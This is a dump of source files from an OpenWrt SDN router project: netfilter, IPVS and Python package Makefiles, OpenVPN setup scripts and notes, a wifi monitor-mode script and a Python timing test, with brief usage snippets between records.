Kernel modules for ARP firewalling\nendef\n\n$(eval $(call KernelPackage,arptables))\n\n\ndefine KernelPackage/ebtables\n SUBMENU:=$(NF_MENU)\n TITLE:=Bridge firewalling modules\n 
FILES:=$(foreach mod,$(EBTABLES-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=CONFIG_BRIDGE_NETFILTER=y \\\n\t$(KCONFIG_EBTABLES)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES-m)))\nendef\n\ndefine KernelPackage/ebtables/description\n ebtables is a general, extensible frame/packet identification\n framework. It provides you to do Ethernet\n filtering/NAT/brouting on the Ethernet bridge.\nendef\n\n$(eval $(call KernelPackage,ebtables))\n\n\ndefine AddDepends/ebtables\n SUBMENU:=$(NF_MENU)\n DEPENDS+=kmod-ebtables $(1)\nendef\n\n\ndefine KernelPackage/ebtables-ipv4\n TITLE:=ebtables: IPv4 support\n FILES:=$(foreach mod,$(EBTABLES_IP4-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=$(KCONFIG_EBTABLES_IP4)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES_IP4-m)))\n $(call AddDepends/ebtables)\nendef\n\ndefine KernelPackage/ebtables-ipv4/description\n This option adds the IPv4 support to ebtables, which allows basic\n IPv4 header field filtering, ARP filtering as well as SNAT, DNAT targets.\nendef\n\n$(eval $(call KernelPackage,ebtables-ipv4))\n\n\ndefine KernelPackage/ebtables-ipv6\n TITLE:=ebtables: IPv6 support\n FILES:=$(foreach mod,$(EBTABLES_IP6-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=$(KCONFIG_EBTABLES_IP6)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES_IP6-m)))\n $(call AddDepends/ebtables)\nendef\n\ndefine KernelPackage/ebtables-ipv6/description\n This option adds the IPv6 support to ebtables, which allows basic\n IPv6 header field filtering and target support.\nendef\n\n$(eval $(call KernelPackage,ebtables-ipv6))\n\n\ndefine KernelPackage/ebtables-watchers\n TITLE:=ebtables: watchers support\n FILES:=$(foreach mod,$(EBTABLES_WATCHERS-m),$(LINUX_DIR)/net/$(mod).ko)\n KCONFIG:=$(KCONFIG_EBTABLES_WATCHERS)\n AUTOLOAD:=$(call AutoLoad,49,$(notdir $(EBTABLES_WATCHERS-m)))\n $(call AddDepends/ebtables)\nendef\n\ndefine KernelPackage/ebtables-watchers/description\n This option adds the log watchers, that you can use in any rule\n in any ebtables table.\nendef\n\n$(eval $(call KernelPackage,ebtables-watchers))\n\n\ndefine KernelPackage/nfnetlink\n SUBMENU:=$(NF_MENU)\n TITLE:=Netlink-based userspace interface\n DEPENDS:=+kmod-ipt-core\n FILES:=$(LINUX_DIR)/net/netfilter/nfnetlink.ko\n KCONFIG:=CONFIG_NETFILTER_NETLINK\n AUTOLOAD:=$(call AutoLoad,48,nfnetlink)\nendef\n\ndefine KernelPackage/nfnetlink/description\n Kernel modules support for a netlink-based userspace interface\nendef\n\n$(eval $(call KernelPackage,nfnetlink))\n\n\ndefine AddDepends/nfnetlink\n SUBMENU:=$(NF_MENU)\n DEPENDS+=+kmod-nfnetlink $(1)\nendef\n\n\ndefine KernelPackage/nfnetlink-log\n TITLE:=Netfilter LOG over NFNETLINK interface\n FILES:=$(LINUX_DIR)/net/netfilter/nfnetlink_log.ko\n KCONFIG:=CONFIG_NETFILTER_NETLINK_LOG\n AUTOLOAD:=$(call AutoLoad,48,nfnetlink_log)\n $(call AddDepends/nfnetlink)\nendef\n\ndefine KernelPackage/nfnetlink-log/description\n Kernel modules support for logging packets via NFNETLINK\nendef\n\n$(eval $(call KernelPackage,nfnetlink-log))\n\n\ndefine KernelPackage/nfnetlink-queue\n TITLE:=Netfilter QUEUE over NFNETLINK interface\n FILES:=$(LINUX_DIR)/net/netfilter/nfnetlink_queue.ko\n KCONFIG:=CONFIG_NETFILTER_NETLINK_QUEUE\n AUTOLOAD:=$(call AutoLoad,48,nfnetlink_queue)\n $(call AddDepends/nfnetlink)\nendef\n\ndefine KernelPackage/nfnetlink-queue/description\n Kernel modules support for queueing packets via NFNETLINK\nendef\n\n$(eval $(call KernelPackage,nfnetlink-queue))\n\n\ndefine KernelPackage/nf-conntrack-netlink\n TITLE:=Connection tracking netlink interface\n 
FILES:=$(LINUX_DIR)/net/netfilter/nf_conntrack_netlink.ko\n KCONFIG:=CONFIG_NF_CT_NETLINK\n AUTOLOAD:=$(call AutoLoad,49,nf_conntrack_netlink)\n $(call AddDepends/nfnetlink,+kmod-ipt-conntrack)\nendef\n\ndefine KernelPackage/nf-conntrack-netlink/description\n Kernel modules support for a netlink-based connection tracking \n userspace interface\nendef\n\n$(eval $(call KernelPackage,nf-conntrack-netlink))\n\ndefine KernelPackage/ipt-hashlimit\n SUBMENU:=$(NF_MENU)\n TITLE:=Netfilter hashlimit match\n KCONFIG:=$(KCONFIG_IPT_HASHLIMIT)\n FILES:=$(LINUX_DIR)/net/netfilter/xt_hashlimit.ko\n AUTOLOAD:=$(call AutoLoad,50,xt_hashlimit)\n $(call KernelPackage/ipt)\nendef\n\ndefine KernelPackage/ipt-hashlimit/description\n Kernel modules support for the hashlimit bucket match module\nendef\n\n$(eval $(call KernelPackage,ipt-hashlimit))\n\n\ndefine KernelPackage/ipvs-core\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server Support\n KCONFIG:= \\\n CONFIG_IP_VS \\\n CONFIG_IP_VS_IPV6=y \\\n CONFIG_IP_VS_PROTO_TCP=y \\\n CONFIG_IP_VS_PROTO_UDP=y \\\n CONFIG_IP_VS_PROTO_ESP=y \\\n CONFIG_IP_VS_PROTO_AH=y \\\n CONFIG_IP_VS_PROTO_SCTP=y \\\n CONFIG_IP_VS_NFCT=y \\\n CONFIG_IP_VS_DEBUG=n \\\n CONFIG_IP_VS_TAB_BITS=12 \\\n CONFIG_IP_VS_SH_TAB_BITS=8 \\\n CONFIG_NETFILTER_XT_MATCH_IPVS=n\n DEPENDS:=+kmod-ipt-core +kmod-lib-crc32c +ip6tables\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs.ko\n AUTOLOAD:=$(call AutoLoad,60,ip_vs)\nendef\n\ndefine KernelPackage/ipvs-core/description\n Kernel modules core support for Linux Virtual Server\nendef\n\n$(eval $(call KernelPackage,ipvs-core))\n\ndefine KernelPackage/ipvs-rr\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server Round Robin Scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_RR\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_rr.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_rr)\nendef\n\ndefine KernelPackage/ipvs-rr/description\n The robin-robin scheduling algorithm simply directs network\nendef\n\n$(eval $(call KernelPackage,ipvs-rr))\n\ndefine KernelPackage/ipvs-wrr\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server weighted round robin scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_WRR\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_wrr.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_wrr)\nendef\n\ndefine KernelPackage/ipvs-wrr/description\n The robin-robin scheduling algorithm with weights\nendef\n\n$(eval $(call KernelPackage,ipvs-wrr))\n\ndefine KernelPackage/ipvs-lc\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server least connections scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_LC\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_lc.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_lc)\nendef\n\ndefine KernelPackage/ipvs-lc/description\n The least-connection scheduling algorithm directs network\n connections to the server with the least number of active\n connections\nendef\n\n$(eval $(call KernelPackage,ipvs-lc))\n\ndefine KernelPackage/ipvs-wlc\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server weighted least connections scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_WLC\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_wlc.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_wlc)\nendef\n\ndefine KernelPackage/ipvs-wlc/description\n The least-connection scheduling algorithm directs network\n connections to the server with the least connections with\n normalized by the server weight\nendef\n\n$(eval $(call KernelPackage,ipvs-wlc))\n\ndefine KernelPackage/ipvs-lblc\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server locality based 
connections scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_LBLC\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_lblc.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_lblc)\nendef\n\ndefine KernelPackage/ipvs-lblc/description\n The locality-based least-connection scheduling algorithm is for\n destination IP load balancing. It is usually used in cache cluster\n This algorithm usually directs packet destined for an IP address to\n its server if the server is alive and under load. If the server is\n overloaded (its active connection numbers is larger than its weight)\n and there is a server in its half load, then allocate the weighted\n least-connection server to this IP address.\nendef\n\n$(eval $(call KernelPackage,ipvs-lblc))\n\ndefine KernelPackage/ipvs-lblcr\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server locality based with replication\n KCONFIG:= \\\n CONFIG_IP_VS_LBLCR\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_lblcr.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_lblcr)\nendef\n\ndefine KernelPackage/ipvs-lblcr/description\n The locality-based least-connection with replication scheduling\n algorithm is also for destination IP load balancing. It is\n usually used in cache cluster. It differs from the LBLC\n scheduling as follows: the load balancer maintains mappings from a target\n to a set of server nodes that can serve the target. Requests \n for a target are assigned to the least-connection node in the target's\n server set. If all the node in the server set are over\n loaded, it picks up a least-connection node in the cluster and adds it\n in the sever set for the target. If the server set has not been\n modified for the specified time, the most loaded node is\n removed from the server set, in order to avoid high degree of replication\nendef\n\n$(eval $(call KernelPackage,ipvs-lblcr))\n\ndefine KernelPackage/ipvs-dh\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server destination hashing scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_DH\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_dh.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_dh)\nendef\n\ndefine KernelPackage/ipvs-dh/description\n The destination hashing scheduling algorithm assigns network\n connections to the servers through looking up a statically assigned\n hash table by their destination IP addresses\nendef\n\n$(eval $(call KernelPackage,ipvs-dh))\n\ndefine KernelPackage/ipvs-sh\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server source hashing scheduler\n KCONFIG:= \\\n CONFIG_IP_VS_SH\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_sh.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_sh)\nendef\n\ndefine KernelPackage/ipvs-sh/description\n The source hashing scheduling algorithm assigns network\n connections to the servers through looking up a statically assigned\n hash table by their source IP addresses\nendef\n\n$(eval $(call KernelPackage,ipvs-sh))\n\ndefine KernelPackage/ipvs-sed\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server shortest expected delay scheduling\n KCONFIG:= \\\n CONFIG_IP_VS_SED\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_sed.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_sed)\nendef\n\ndefine KernelPackage/ipvs-sed/description\n The shortest expected delay scheduling algorithm assigns network\n connections to the server with the shortest expected delay. 
The\n expected delay that the job will experience is (Ci + 1) / Ui if\n sent to the ith server, in which Ci is the number of connections\n on the ith server and Ui is the fixed service rate (weight)\n of the ith server.\nendef\n\n$(eval $(call KernelPackage,ipvs-sed))\n\ndefine KernelPackage/ipvs-nq\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server never queuing scheduling\n KCONFIG:= \\\n CONFIG_IP_VS_NQ\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_nq.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_nq)\nendef\n\ndefine KernelPackage/ipvs-nq/description\n The never queue scheduling algorithm adopts a two-speed model.\n When there is an idle server available, the job will be sent to\n the idle server, instead of waiting for a fast one. When there\n is no idle server available, the job will be sent to the server\n that minimize its expected delay (The Shortest Expected Delay\n scheduling algorithm)\nendef\n\n$(eval $(call KernelPackage,ipvs-nq))\n\ndefine KernelPackage/ipvs-ftp\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server FTP protocol helper\n KCONFIG:= \\\n CONFIG_IP_VS_FTP\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_ftp.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_ftp)\nendef\n\ndefine KernelPackage/ipvs-ftp/description\n FTP is a protocol that transfers IP address and/or port number in\n the payload. In the virtual server via Network Address Translation,\n the IP address and port number of real servers cannot be sent to\n clients in ftp connections directly, so FTP protocol helper is\n required for tracking the connection and mangling it back to that of\n virtual service.\nendef\n\n$(eval $(call KernelPackage,ipvs-ftp))\n\ndefine KernelPackage/ipvs-pe-sip\n SUBMENU:=$(NF_MENU)\n TITLE:=IP Virtual Server SIP persistence engine\n KCONFIG:= \\\n CONFIG_IP_VS_PE_SIP\n DEPENDS:=+kmod-ipvs-core\n FILES:=$(LINUX_DIR)/net/netfilter/ipvs/ip_vs_pe_sip.ko\n AUTOLOAD:=$(call AutoLoad,65,ip_vs_pe_sip)\nendef\n\ndefine KernelPackage/ipvs-pe-sip/description\n Allow persistence based on the SIP Call-I\nendef\n\n$(eval $(call KernelPackage,ipvs-pe-sip))\n\n"
},
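
The IPVS scheduler help texts in the Makefile above reduce to simple selection rules; the shortest-expected-delay formula (Ci + 1) / Ui, for instance, can be sanity-checked in a few lines. A toy sketch, independent of the kernel modules themselves:

def sed_pick(servers):
    # servers: iterable of (name, active_conns, weight); smallest (C + 1) / U wins
    return min(servers, key=lambda s: (s[1] + 1.0) / s[2])

print(sed_pick([('a', 10, 2), ('b', 3, 1), ('c', 7, 4)]))  # picks 'c': 8/4 = 2.0
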
{
"alpha_fraction": 0.6947456002235413,
"alphanum_fraction": 0.7214345335960388,
"avg_line_length": 22.05769157409668,
"blob_id": "6f26a1a162b1e70c53721fc40d2558c27d8de630",
"content_id": "747c7936578b0557a5ec02df79a828368a8a38e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1199,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 52,
"path": "/packages/python-tweepy/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2012 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=tweepy\nPKG_VERSION:=2.1\n#PKG_RELEASE:=2\n\nPKG_SOURCE:=tweepy-$(PKG_VERSION).tar.gz\nPKG_SOURCE_URL:=https://pypi.python.org/packages/source/t/tweepy/\nPKG_MD5SUM:=529819cc8a0b283b7b47470ceb06cd16\n\nPKG_BUILD_DIR:=$(BUILD_DIR)/$(PKG_NAME)-$(PKG_VERSION)\nPKG_BUILD_DEPENDS:=python\n\ninclude $(INCLUDE_DIR)/package.mk\n$(call include_mk, python-package.mk)\n\ndefine Package/python-tweepy\n SUBMENU:=Python\n SECTION:=lang\n CATEGORY:=Languages\n TITLE:=python-tweepy\n URL:=https://github.com/tweepy/tweepy\n DEPENDS:=+python\n MAINTAINER:[email protected]\nendef\n\ndefine Package/python-tweepy/description\n A Python library for accessing the Twitter API\nendef\n\ndefine Build/Compile\n\t$(INSTALL_DIR) $(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t\t$(PKG_BUILD_DIR)/tweepy \\\n \t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)\nendef\n\ndefine Package/python-tweepy/install\n\t$(INSTALL_DIR) $(1)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t\t$(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)/tweepy \\\n\t\t$(1)$(PYTHON_PKG_DIR)\nendef\n\n$(eval $(call BuildPackage,python-tweepy))\n"
},
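
The Makefile above only packages tweepy 2.1 for opkg; once it is installed on the router, the usual OAuth handshake applies. A sketch with all four credentials as placeholders:

import tweepy

auth = tweepy.OAuthHandler('CONSUMER_KEY', 'CONSUMER_SECRET')
auth.set_access_token('ACCESS_TOKEN', 'ACCESS_SECRET')
api = tweepy.API(auth)
api.update_status('hello from openwrt')  # posts a tweet
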
{
"alpha_fraction": 0.5025906562805176,
"alphanum_fraction": 0.7331606149673462,
"avg_line_length": 37.5,
"blob_id": "f4a79775050adf1292ed7a1d05fb96c63ad9830f",
"content_id": "ebff30a55035aa3ad37f7dc6512858ca41924272",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 10,
"path": "/packages/iipr/files/etc/openvpn/up2.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nACTION=ifup DEVICE=tun0 INTERFACE=vpn /sbin/hotplug-call iface\n#/sbin/ifconfig tun0 10.8.0.238 pointopoint 10.8.0.237 mtu 1500\n#/etc/openvpn/up.sh tun0 1500 1560 10.8.0.238 10.8.0.237 init\n#/sbin/ifconfig tun0 $4 pointopoint $5 mtu $2\n#/etc/openvpn/up.sh tun0 1500 1542 5.5.227.180 255.255.0.0 init\n/sbin/ifconfig tun0 $4 netmask $5 mtu $2 broadcast 5.5.255.255\n\nexit 0\n\n"
},
{
"alpha_fraction": 0.6404494643211365,
"alphanum_fraction": 0.6779026389122009,
"avg_line_length": 19.538461685180664,
"blob_id": "6868f9fcc470cd5846a160ee07c5473fe5e3a427",
"content_id": "0dedcbb66410bb718ba1717f9316be8485dd7502",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 267,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 13,
"path": "/python/scapy/start_wifi_monitor.sh",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n/etc/init.d/netserver stop\n/etc/init.d/snmpd stop\n/etc/init.d/collectd stop\n/etc/init.d/lldpd stop\n/etc/init.d/openvpn stop\n \ninsmod /lib/modules/3.3.8/rt5572sta.ko\nifconfig ra0 up\niwlist ra0 scan \niwconfig ra0 mode monitor\nfree\n"
},
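
start_wifi_monitor.sh stops the daemons, loads the RT5572 driver, and flips ra0 into monitor mode. The same interface steps driven from Python, as a sketch: it assumes the kernel module is already loaded, and most drivers want the interface brought down before a mode change.

import subprocess

for cmd in (['ifconfig', 'ra0', 'down'],
            ['iwconfig', 'ra0', 'mode', 'monitor'],
            ['ifconfig', 'ra0', 'up']):
    subprocess.check_call(cmd)
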
{
"alpha_fraction": 0.7810361385345459,
"alphanum_fraction": 0.7878788113594055,
"avg_line_length": 39.91999816894531,
"blob_id": "7de4b481ff52c14ad33cfc5bdaae40eb2b79e0d2",
"content_id": "1c4a6592c221accd9466684865f8286460ea184f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1023,
"license_type": "no_license",
"max_line_length": 274,
"num_lines": 25,
"path": "/notes/openvpn-client-providers.md",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "The use case called for L2 VPN with credential authentication which provider ibvpn.net offers. Openwrt by default is not configured to work with this type of configuraion. This is an outline on how the solution was assembled to provide this feature for use with ibvpn.net \n\nConfigure openvpn build\n\n--auth-user-pass [up] \nAuthenticate with server using username/password. up is a file containing username/password on 2 lines OpenVPN will only read passwords from a file if it has been built with the --enable-password-save configure option\n\nIf up is omitted, username/password will be prompted from the console.\n\nAdd directive to .ovpn file\nCreate new file named user.conf and then add your clients username and password\n\n1. Create a txt file on a folder alongside your .ovpn files \n2. Put your user/pass inside the file in two(2) lines, like:\n\nusername\npassword\n\n3. Then save it.\n4. Open up your .ovpn file and add:\n\nauth-user-pass user.conf\n\nTODO:\nluci interface to enter the credentials so CLI access is not required.\n"
},
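
The four manual steps in the note above are easy to script. A sketch that writes the credential file and appends the directive ('client.ovpn' and both credential lines are placeholders; OpenVPN expects exactly two lines, username then password):

with open('user.conf', 'w') as f:
    f.write('username\n')
    f.write('password\n')

with open('client.ovpn', 'a') as f:
    f.write('\nauth-user-pass user.conf\n')
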
{
"alpha_fraction": 0.6908904910087585,
"alphanum_fraction": 0.711361289024353,
"avg_line_length": 17.788461685180664,
"blob_id": "1ce33a62cab9671ccf28f1b307bb598cc186716f",
"content_id": "7d3f3be1662dc3deab8b61d2bfbdc5ee45fff98a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 977,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 52,
"path": "/packages/iipr/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "# \n# Copyright (C) 2006-2011 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=iipr\nPKG_VERSION:=1.0.0\nPKG_RELEASE:=1\n\nPKG_BUILD_DIR := $(BUILD_DIR)/$(PKG_NAME)\n\ninclude $(INCLUDE_DIR)/package.mk\n\ndefine Package/iipr\n SECTION:=utils\n CATEGORY:=Base system\n TITLE:=iipr scripts\n PKGARCH:=all\nendef\n\ndefine Package/iipr/description\n A set of scripts that for the sdn app\nendef\n\ndefine Package/iipr/conffiles\n/etc/uci-defaults/luci-start\nendef\n\ndefine Build/Prepare\nendef\n\ndefine Build/Configure\nendef\n\ndefine Build/Compile\nendef\n\ndefine Package/iipr/install\n\t$(INSTALL_DIR) $(1)\n\tmkdir -p $(1)/etc/uci-defaults\n\t$(CP) ./files/etc/uci-defaults/* $(1)/etc/uci-defaults/\n\tmkdir -p $(1)/etc/config/\n\t$(CP) ./files/etc/config/* $(1)/etc/config/\n\tmkdir -p $(1)/etc/openvpn\n\t$(CP) ./files/etc/openvpn/* $(1)/etc/openvpn/\nendef\n\n$(eval $(call BuildPackage,iipr))\n"
},
{
"alpha_fraction": 0.6829059720039368,
"alphanum_fraction": 0.7256410121917725,
"avg_line_length": 21.941177368164062,
"blob_id": "305360ab301746d17ffc13118153bd60333b7c13",
"content_id": "f843214e3d32fe236cf112e209449a51042913ec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 128,
"num_lines": 51,
"path": "/packages/python-wifi/Makefile",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#\n# Copyright (C) 2008-2011 OpenWrt.org\n#\n# This is free software, licensed under the GNU General Public License v2.\n# See /LICENSE for more information.\n#\n\ninclude $(TOPDIR)/rules.mk\n\nPKG_NAME:=python-wifi\nPKG_VERSION:=0.5.0\nPKG_RELEASE:=1\n\n#http://downloads.sourceforge.net/project/pythonwifi.berlios/python-wifi-0.5.0.tar.bz2?r=&ts=1388036164&use_mirror=softlayer-dal\n\nPKG_SOURCE:=$(PKG_NAME)-$(PKG_VERSION).tar.gz\nPKG_SOURCE_URL:=@SF/python-wifi\nPKG_MD5SUM:=eec19df59fd75ba5a136992897f8e468\n\nPKG_BUILD_DEPENDS:=python\n\ninclude $(INCLUDE_DIR)/package.mk\n$(call include_mk, python-package.mk)\n\ndefine Package/python-wifi\n SUBMENU:=Python\n SECTION:=lang\n CATEGORY:=Languages\n TITLE:=python-wifi\n URL:=http://python-wifi.sourceforge.net\n DEPENDS:=+python-mini\nendef\n\ndefine Package/pyserial/description\n wifi extensions in pure python\nendef\n\ndefine Build/Compile\n\t$(call Build/Compile/PyMod,., \\\n\t\tinstall --prefix=\"/usr\" --root=\"$(PKG_INSTALL_DIR)\", \\\n\t)\nendef\n\ndefine Package/pyserial/install\n\t$(INSTALL_DIR) $(1)$(PYTHON_PKG_DIR)\n\t$(CP) \\\n\t $(PKG_INSTALL_DIR)$(PYTHON_PKG_DIR)/* \\\n\t $(1)$(PYTHON_PKG_DIR)/\nendef\n\n$(eval $(call BuildPackage,python-wifi))\n"
},
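
Once the python-wifi package above is installed, the wireless extensions are reachable from Python. A sketch using the module layout documented for python-wifi 0.5.x (pythonwifi.iwlibs); treat the exact import path as an assumption if a different release ends up packaged:

from pythonwifi.iwlibs import Wireless, getNICnames

nics = getNICnames()  # e.g. ['ra0']
if nics:
    wifi = Wireless(nics[0])
    print(nics[0], wifi.getEssid())
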
{
"alpha_fraction": 0.5218703150749207,
"alphanum_fraction": 0.5580694079399109,
"avg_line_length": 18.47058868408203,
"blob_id": "f7f60f281cbb57230cf2f62987cb4da9637b03b8",
"content_id": "8b0a3480e3ca7eab5eb25e549462ccaa3e641772",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 663,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 34,
"path": "/python/scapy/timeit-test.py",
"repo_name": "houzhenggang/openwrtSDN",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\nimport timeit\nfrom timeit import Timer, timeit, repeat\n\nlst = range(100)\n\ndef f1(lst):\n out = []\n for item in lst:\n out.append(lst[lst.index(item)])\n return out\n \ndef f2(lst):\n return [item for item in lst]\n \ndef test():\n c=0\n for i in range(100):\n c=i-c\n return c\n \nprint(test())\n\nprint(__name__)\nTimeIt = timeit(\"test()\", setup=\"from __main__ import test\", number=100000)\nRepeat = repeat(\"test()\", setup=\"from __main__ import test\", repeat=3, number=100000)\nprint(TimeIt)\nprint(Repeat, min(Repeat))\n\n \n# %timeit f1(lst)\n \n# %timeit f2(lst)\n\n"
}
] | 26 |
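
The commented-out %timeit lines at the bottom of timeit-test.py are IPython magics and do nothing in a plain interpreter; the stdlib equivalent uses the same setup-string pattern the script already demonstrates. A self-contained sketch with f1/f2 copied from that script:

from timeit import timeit

lst = list(range(100))

def f1(lst):
    out = []
    for item in lst:
        out.append(lst[lst.index(item)])
    return out

def f2(lst):
    return [item for item in lst]

print(timeit('f1(lst)', setup='from __main__ import f1, lst', number=1000))
print(timeit('f2(lst)', setup='from __main__ import f2, lst', number=1000))
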
irvega/ptavi-p3
|
https://github.com/irvega/ptavi-p3
|
6e276314f0f5b4885ce9e96a5cb754d73f481822
|
737de3890d969171582d43110d2b9f396267f39d
|
f1af2e584a8eba5cea81344e37d25e0d185dae9c
|
refs/heads/master
| 2021-07-13T08:08:26.893277 | 2017-10-16T12:17:47 | 2017-10-16T12:17:47 | 106,249,158 | 0 | 0 | null | 2017-10-09T07:16:03 | 2016-09-29T07:35:46 | 2017-10-03T13:15:15 | null |
[
{
"alpha_fraction": 0.5725768208503723,
"alphanum_fraction": 0.5782505869865417,
"avg_line_length": 29.65217399597168,
"blob_id": "8868e4b61ac02283c93831bb59a578c1a21dfd0c",
"content_id": "c47a2b747153363cd14f32b96e615ee7a110ebd3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2115,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 69,
"path": "/karaoke.py",
"repo_name": "irvega/ptavi-p3",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport sys\nfrom xml.sax import make_parser\nfrom xml.sax.handler import ContentHandler\nfrom smallsmilhandler import SmallSMILHandler\nimport json\nfrom urllib.request import urlretrieve\n\nif len(sys.argv) != 2:\n sys.exit(\" Usage: python3 karaoke.py file.smil\")\ntry:\n open(sys.argv[1])\nexcept FileNotFoundError:\n sys.exit(' This file not found, try again')\n\n\nclass KaraokeLocal(SmallSMILHandler):\n def __init__(self):\n parser = make_parser()\n sHandler = SmallSMILHandler()\n parser.setContentHandler(sHandler)\n parser.parse(open(sys.argv[1]))\n self.lista = sHandler.get_tags()\n \"\"\"\n Lee fichero e imprime atributos y elementos\n \"\"\"\n\n def __str__(self):\n liststr = ''\n for etiquetasD in self.lista:\n liststr += etiquetasD['name']\n for atribt in etiquetasD:\n if etiquetasD[atribt] != \"\" and atribt != 'name':\n liststr += \"\\t\" + atribt + '=\"' + etiquetasD[atribt] + '\"'\n liststr += \"\\n\"\n return(liststr)\n \"\"\"\n Recorre la lista donde guardo el fichero y la imprime por filas\n \"\"\"\n def to_json(self, fichsmil, fichjson=''):\n if fichjson == '':\n fichjson = fichsmil.split('.')[0] + '.json'\n with open(fichjson, 'w') as fijson:\n json.dump(self.lista, fijson)\n \"\"\"\n Convierte el fichero .smil en .json\n \"\"\"\n\n def do_local(self):\n for etiquetasD in self.lista:\n for atribt in etiquetasD:\n if etiquetasD[atribt][0:7] == 'http://':\n long_atrib = etiquetasD[atribt]\n short_atrib = etiquetasD[atribt].split('/')[-1]\n urlretrieve(long_atrib, short_atrib)\n etiquetasD[atribt] = short_atrib\n \"\"\"\n Guarda los archivos en local y cambia el 